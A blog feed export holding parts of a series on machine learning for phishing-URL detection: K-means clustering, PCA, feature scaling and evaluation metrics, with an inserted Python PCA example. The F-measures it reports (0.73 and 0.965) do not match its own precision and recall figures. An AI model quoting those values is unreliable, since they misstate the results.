Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.629294</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.422005}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.422005</td><td data-sheets-value="{"1":3,"3":1.051774}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.051774</td><td data-sheets-value="{"1":3,"3":2.283579}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">2.283579</td><td 
data-sheets-value="{"1":3,"3":0.231025}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.231025</td><td data-sheets-value="{"1":3,"3":0.166056}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.166056</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":14}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">14</td><td data-sheets-value="{"1":3,"3":14.11996}" style="background-color: #d9ead3; border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">14.11996</td><td data-sheets-value="{"1":3,"3":2.516235}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">2.516235</td><td data-sheets-value="{"1":3,"3":1.889826}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.889826</td><td data-sheets-value="{"1":3,"3":3.106087}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">3.106087</td><td 
data-sheets-value="{"1":3,"3":0.087103}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.087103</td><td data-sheets-value="{"1":3,"3":0.705648}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.705648</td><td data-sheets-value="{"1":3,"3":0.275448}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.275448</td><td data-sheets-value="{"1":3,"3":0.247926}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.247926</td><td data-sheets-value="{"1":3,"3":0.20654}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.20654</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":15}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">15</td><td data-sheets-value="{"1":3,"3":5.828471}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: 
bottom;">5.828471</td><td data-sheets-value="{"1":3,"3":0.885469}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.885469</td><td data-sheets-value="{"1":3,"3":0}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.163353}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.163353</td><td data-sheets-value="{"1":3,"3":0}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.260362}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.260362</td><td data-sheets-value="{"1":3,"3":0.080788}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.080788</td><td data-sheets-value="{"1":3,"3":0.186429}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); 
border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.186429</td><td data-sheets-value="{"1":3,"3":0.010403}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.010403</td><td data-sheets-value="{"1":3,"3":0.07444}" style="border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.07444</td></tr></tbody></table></google-sheets-html-origin></span></div><div><br /></div><div><b>References</b></div><div><b><br /></b></div><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: x-small;"><span style="font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[1] Attention is All They Need: Combatting Social Media Information Operations With Neural Language Models. FireEye, 2019. 
Available at </span><a href="https://www.fireeye.com/blog/threat-research/2019/11/combatting-social-media-information-operations-neural-language-models.html" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.fireeye.com/blog/threat-research/2019/11/combatting-social-media-information-operations-neural-language-models.html</span></a><span style="font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: x-small;"><span style="font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[2] Schwartz J. Autonomous Penetration Testing using Reinforcement Learning. University of Queensland, 2018, available at </span><span style="color: #1155cc; font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;"><a href="https://arxiv.org/ftp/arxiv/papers/1905/1905.05965.pdf" style="text-decoration-line: none;">https://arxiv.org/ftp/arxiv/papers/1905/1905.05965.pdf</a></span></span></p><span style="font-size: x-small;"><span style="font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[3] Mastering the game of Go without human knowledge. DeepMind, 2017. 
Available at </span><a href="https://www.nature.com/articles/nature24270.epdf" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.nature.com/articles/nature24270.epdf</span></a><span style="font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></span></span>Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-40458173302552066832020-03-26T15:36:00.000-07:002020-03-27T00:19:20.373-07:00AI and Cybersecurity. Part 4 - Clustering URLs<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipfjE6hJ94JZ2hyphenhyphenh3t8vzc3ugLFRydsnrxOHb3zszy-lnXa557hnxHxmPJVl74OhUyxnNFg8-1PthlUPhLGpG7-u-dekrZXYJGG2mNlRQw90xP-SzukyZFZ0ftvKSjiFXUqfgK0Hf0dkgi/s1600/Clustering_title.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="682" data-original-width="1015" height="430" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipfjE6hJ94JZ2hyphenhyphenh3t8vzc3ugLFRydsnrxOHb3zszy-lnXa557hnxHxmPJVl74OhUyxnNFg8-1PthlUPhLGpG7-u-dekrZXYJGG2mNlRQw90xP-SzukyZFZ0ftvKSjiFXUqfgK0Hf0dkgi/s640/Clustering_title.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
In <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-3.html">Part 3</a>, we applied feature scaling and dimensionality reduction techniques to a dataset of phishing and benign URLs. As a result, we could clearly see how the URLs of the two classes are distributed based on four attributes: registrar, country, lifetime, and protocol.<br />
<br />
But what if we don’t have labels (<i>phishing</i> and <i>benign</i>) for the Internet links in the beginning? Will ML still work to detect phishing attacks? In this case, we can turn to unsupervised learning, in particular clustering. Clustering groups objects of unknown classes according to common features, so we do not need labeled data for a training set.<br />
<a name='more'></a>Here, we're going to use the popular clustering method called K-means. K-means seeks to minimize the total squared deviation of the points in each cluster from the center of that cluster (the within-cluster sum of squares). There are two clusters in this example.<br />
<div>
<br />
With the t-SNE dimensionality reduction technique for projecting clustered data onto a two-dimensional plane, we obtain the following visualized results (Figure 1).</div>
<div>
<br />
<div style="text-align: center;">
<img src="https://s.dou.ua/storage-files/image3_ZeRji1z.png" /></div>
<br />
<div style="text-align: center;">
<i>Figure 1. </i>Visualization of the URLs in two-dimensional space after clustering with K-means (phishing links - orange dots, benign links - blue dots).</div>
<br />
<br />
<div style="text-align: left;">
The resulting clusters can be compared with the labeled data to get an idea of the accuracy of the cluster analysis.</div>
<div style="text-align: left;">
<img src="https://s.dou.ua/storage-files/Untitled-4_i6LwSV6.png" /></div>
<div style="text-align: center;">
<i>Figure 2. </i>The training dataset with the labeled data (left) and the K-means clustering results (right).</div>
<br />
A more accurate assessment of the clustering efficiency can be obtained using the metrics described in <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-2.html">Part 2</a>: TPR, TNR, FPR, FNR, PPV, NPV, F-measure.<br />
<br />
<ul style="text-align: left;">
<li>TP = 110, TN = 41, FP = 7, FN = 44;</li>
<li>TPR (Recall) = 71%;</li>
<li>TNR = 85%;</li>
<li>FPR = 15%;</li>
<li>FNR = 29%;</li>
<li>PPV (Precision) = 0.94;</li>
<li>NPV = 0.48;</li>
<li>Accuracy = 0.75;</li>
<li>F-measure = 0.73.</li>
</ul>
<br />
To improve the accuracy of the method, we can apply feature scaling, which we discussed in <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-3.html">Part 3</a>.<br />
<div style="text-align: center;">
<img src="data:image/png;base64,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" /></div>
<div style="text-align: center;">
<i>Figure 3.</i> Visualization of the URLs in two-dimensional space after clustering with <i>K-means</i> and <i>min-max</i> normalization (phishing links - orange dots, benign links - blue dots).</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1gqB1dPTUX6tjvQB81fJ90DR6u6cN0xnyFE0iN2egufgmyQ2My13vvzWHK2XggVwCBwwuncHHnYNu82uB9REr6-2TxCvfnxCkZd2Rfzh7CsAlw7TyCFDbr5ulqE0P1EBDZg42dx2nGLtF/s1600/Kmeans_minmaxnorm2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="270" data-original-width="802" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1gqB1dPTUX6tjvQB81fJ90DR6u6cN0xnyFE0iN2egufgmyQ2My13vvzWHK2XggVwCBwwuncHHnYNu82uB9REr6-2TxCvfnxCkZd2Rfzh7CsAlw7TyCFDbr5ulqE0P1EBDZg42dx2nGLtF/s1600/Kmeans_minmaxnorm2.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<i>Figure 4. </i>The training dataset with the labeled data (left) and the <i>K-means</i> clustering results with <i>min-max</i> normalization (right).</div>
</div>
<div>
The "classifier's" evaluation:</div>
<div>
<ul style="text-align: left;">
<li>TP = 148, TN = 48, FP = 0, FN = 6 </li>
<li>TPR (Recall) = 96%</li>
<li>TNR = 100% </li>
<li>FPR = 0%</li>
<li>FNR = 3.9%</li>
<li>PPV (Precision) = 1 </li>
<li>NPV = 0.89 </li>
<li>Accuracy = 0.97</li>
<li>F-measure = 0.965</li>
</ul>
</div>
<div>
<div style="text-align: left;">
As you can see, feature scaling can dramatically improve the quality of clustering (classification), from 75% to 97% in terms of Accuracy, so that even unsupervised learning can be used for the detection of phishing URLs, provided that we can identify which cluster contains which kind of URLs. One option is to take URLs from each cluster after clustering and scan them on VirusTotal or look them up on PhishTank to identify the class of the cluster: phishing or benign. According to the metrics calculated above, we need to gather verdicts for more than 2*3.9% (2*max(FNR, FPR)) of the phishing URLs to be able to classify the whole cluster as the one that contains phishing links.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
In this post, we considered a hypothetical case of URL clustering that, under some conditions, can be turned into a solution to the classification problem. In practice, clustering can also help to identify a group of unknown malware samples submitted to a malware lab that were missed by a trained classifier (FN) and/or a signature scanner and that may belong to the same malware family or have been written by the same threat actor - the attribution problem. Further, the clustered data that we classified post factum can be used in supervised learning to train the classifier.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
If you want to play with the model, the source code is available on <a href="https://github.com/AlexanderAda/NioGuardSecurityLab/tree/master/Courses/ML%20in%20Cybersecurity/Phishing%20detection">Github</a>.</div>
<br />
To be continued...</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-10895552920872722062020-03-18T14:47:00.003-07:002020-11-02T03:21:18.684-08:00AI and Cybersecurity. Part 3 - Dimensionality Reduction and Feature Scaling<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<img height="210" src="https://lh5.googleusercontent.com/8vmVU474H0qdbmVvMtLxmLi_Q4y-ydqh78XczP0SEWrwIijio55kV7lPAN3w3c3x9lfkKXBdCCf-0Vb9Xi42-om6qJ3qLSIm96WhYAu0lZp9bs9K5MEkQRfTrv6WJg7J3s-OaY3A" style="font-family: Arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre-wrap;" width="640" /></div>
<div>
In the previous <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-2.html">post</a>, we created a binary classifier for detecting phishing URLs. Here, we're going to continue exploring the data with visualization techniques.<br />
<div>
<a name='more'></a>Since the number of features or attributes in a model is often more than 2 or 3 (in real models, thousands and even millions), the question arises: how do we represent objects or observations in two- or three-dimensional space in order to see the patterns in their distribution, assess the possibility of further classification or clustering, and verify the correctness of feature extraction? For these purposes, you can use dimensionality reduction methods. Here, we will consider two techniques - linear (PCA) and non-linear (t-SNE) dimensionality reduction.</div>
<div>
<br />
The <a href="https://en.wikipedia.org/wiki/Principal_component_analysis">Principal Component Analysis (PCA)</a> algorithm carries out a linear mapping of the data into a space of lower dimension such that the variance of the data in the low-dimensional representation is maximized.<br />
<br />
In our case, after reducing the dimension to two components, we have the following outcomes:<br />
<ul style="text-align: left;">
<li><i>Component 1</i>: −<b>0.998 x Registrar_code</b> + 0.065 x Lifetime − 0.022 x Country_code + 0.006 x Protocol_code</li>
<li><i>Component 2</i>: 0.020 x Registrar_code − 0.035 x Lifetime − <b>0.999 x Country_code</b> − 0.005 x Protocol_code</li>
</ul>
We see that the domain registrar (<i>Registrar_code</i>) makes the main contribution to <i>Component 1</i> and the country where the server is located (<i>Country_code</i>) to <i>Component 2</i>. This can be explained by the fact that both of these attributes are categorical and, after encoding them as ordinal numbers, their values span a wide range and, as a result, have a large variance. The value ranges of the attributes are as follows: Registrar_code: [1, 92], Country_code: [1, 28], Lifetime: [1, 34], Protocol_code: [0, 1]. In this case, it is worth experimenting with categorical data encoding algorithms, for example one-hot encoding, which may change the PCA components.</div>
<div>
<br /></div>
<div style="text-align: center;">
<img src="https://s.dou.ua/storage-files/image11_gY2LAZP.png" /></div>
<div>
<br /></div>
<div style="text-align: center;">
<i>Figure 1.</i> Visualization of URLs in the two-dimensional space after applying the PCA technique (phishing links - orange dots, benign links - blue dots).</div>
<div>
<br /></div>
<div>
It is difficult to identify separate groups of benign and phishing links in Figure 1.<br />
<br />
Let us do an experiment and scale <i>Lifetime</i> by multiplying its values by a coefficient, say <i>K</i>=100. We then see a major impact from this attribute in one of the PCA components and, as a result, a different distribution of the dots on the plot.</div>
<ul style="text-align: left;">
<li><i>Component 1</i>: -0.013 x Registrar_code + <b>1.000 x Lifetime_new</b> + 0.000 x Country_code + 0.000 x Protocol_code</li>
<li><i>Component 2</i>: <b>-1.000 x Registrar_code</b> - 0.013 x Lifetime - 0.026 x Country_code + 0.003 x Protocol_code</li>
</ul>
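<div>
The dependence of the PCA loadings on each attribute's value range, as an added example that is not the post's code: pure-Python PCA by power iteration on the covariance matrix of a constructed dataset in the same encoding, run on the raw codes and again with <i>Lifetime</i> multiplied by <i>K</i>=100. The loadings differ from the post's because the data is constructed, but the dominant attribute of <i>Component 1</i> flips from <i>Registrar_code</i> to <i>Lifetime</i> in the same way.</div>

```python
"""Added example (not the post's code): the first two PCA components of the four URL
attributes, computed by power iteration on the covariance matrix, first on the raw
ordinal codes and then with Lifetime multiplied by K=100. Pure Python; the data is
constructed, so the loadings differ from the post's, but the effect is the same."""
import math

ATTRS = ("Registrar_code", "Country_code", "Lifetime", "Protocol_code")
# Constructed sample in the post's encoding (7 phishing rows, then 7 benign rows):
# Registrar_code spans 5..90, Country_code 3..25, Lifetime 1..34, Protocol_code 0..1.
POINTS = [
    (5, 3, 1, 0), (60, 12, 2, 0), (90, 23, 1, 0), (30, 7, 3, 0), (75, 20, 2, 0),
    (15, 4, 1, 0), (22, 5, 2, 0), (8, 3, 30, 1), (55, 12, 25, 1), (88, 25, 34, 1),
    (28, 7, 28, 1), (70, 20, 32, 1), (12, 4, 26, 1), (82, 22, 31, 1),
]


def covariance(points):
    """Sample covariance matrix (d x d) of the attribute columns."""
    n, d = len(points), len(points[0])
    mean = [sum(p[j] for p in points) / n for j in range(d)]
    centred = [[p[j] - mean[j] for j in range(d)] for p in points]
    return [[sum(r[i] * r[j] for r in centred) / (n - 1) for j in range(d)] for i in range(d)]


def matvec(m, v):
    return [sum(row[j] * v[j] for j in range(len(v))) for row in m]


def dominant_eigvec(m, iters=1000):
    """Power iteration: the unit eigenvector of the largest eigenvalue of a symmetric
    matrix, i.e. the direction of maximum variance when m is a covariance matrix."""
    d = len(m)
    v = [1.0 / math.sqrt(d)] * d
    for _ in range(iters):
        w = matvec(m, v)
        norm = math.sqrt(sum(x * x for x in w))
        if norm == 0.0:
            break
        v = [x / norm for x in w]
    lead = max(range(d), key=lambda j: abs(v[j]))
    return [-x for x in v] if v[lead] < 0 else v  # the sign of a component is arbitrary


def pca_two_components(points):
    """First two principal components as loading vectors over ATTRS; the second is
    found after deflating the covariance matrix by the first (Hotelling deflation)."""
    cov = covariance(points)
    d = len(cov)
    c1 = dominant_eigvec(cov)
    lam1 = sum(x * y for x, y in zip(c1, matvec(cov, c1)))  # variance along c1
    deflated = [[cov[i][j] - lam1 * c1[i] * c1[j] for j in range(d)] for i in range(d)]
    return c1, dominant_eigvec(deflated)


def dominant_attribute(component):
    """Name of the attribute with the largest absolute loading."""
    return ATTRS[max(range(len(component)), key=lambda j: abs(component[j]))]


def scale_attribute(points, name, k):
    """Multiply one attribute by k, as the post does with Lifetime and K=100."""
    idx = ATTRS.index(name)
    return [tuple(x * k if j == idx else x for j, x in enumerate(p)) for p in points]


def describe(component):
    return " + ".join(f"{w:.3f} x {a}" for w, a in zip(component, ATTRS))


if __name__ == "__main__":
    # Raw codes: Registrar_code (largest range, largest variance) dominates Component 1.
    # Lifetime x 100: its variance grows 10,000-fold and it takes over Component 1.
    for title, data in (("raw codes", POINTS),
                        ("Lifetime x 100", scale_attribute(POINTS, "Lifetime", 100))):
        c1, c2 = pca_two_components(data)
        print(title)
        print("  Component 1:", describe(c1), "-> dominated by", dominant_attribute(c1))
        print("  Component 2:", describe(c2), "-> dominated by", dominant_attribute(c2))
```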
<div>
<div style="text-align: center;">
<img alt="inline base64 image data removed" src="
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